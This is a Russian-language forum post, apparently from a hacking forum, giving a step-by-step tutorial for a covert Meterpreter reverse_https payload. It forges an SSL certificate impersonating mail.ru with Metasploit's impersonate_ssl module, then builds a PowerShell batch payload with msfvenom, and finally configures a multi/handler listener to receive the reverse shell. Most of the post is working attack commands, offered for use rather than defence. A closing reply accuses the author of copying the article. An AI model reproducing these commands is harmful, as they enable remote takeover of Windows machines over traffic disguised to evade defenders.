Всем привет. Сегодня я покажу как можно с помощью подручных средств в кали линукс, создать защищенный канал между полезной нагрузкой и листенером. На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode. Статья - Создание SSL сертификата. Meterpreter. MPM Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим: создания поддельного сертификата создадим полезную нагрузку PowerShell где будем использовать сертификат который сгенерировали ранее. Создания и настройка листенера для работы с нашей полезной нагрузкой. Для создания поддельного сертификата мы будем использовать модуль из метасплойта auxiliary/gather/impersonate_ssl Я буду генерировать сертификат mail.ru Запускаем метасплойт пишем: use auxiliary/gather/impersonate_ssl set RHOST www.mail.ru run По итогу как мы видим у нас создалось три файла. Не плохой срок действия..) Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом. msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/www.mail.ru.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o 4444.bat Далее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно: set HandlerSSLCert /root/www.mail.ru.pem (путь где файл сертификата) set StagerVerifySSLCert true полностью это будет выглядеть следующим образом. use multi/handler set payload windows/meterpreter/reverse_https set LHOST 192.168.0.108 set LPORT 4444 set HandlerSSLCert /root/www.mail.com.pem set StagerVerifySSLCert true exploit -j Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться. По итогу получаем заветную сессию с проверкой сертификата SSL На этом всё, спасибо за внимание.
billmine, Прежде чем копировать с codeby (не реклама) сначала бы зарегался там что бы картинки большие были.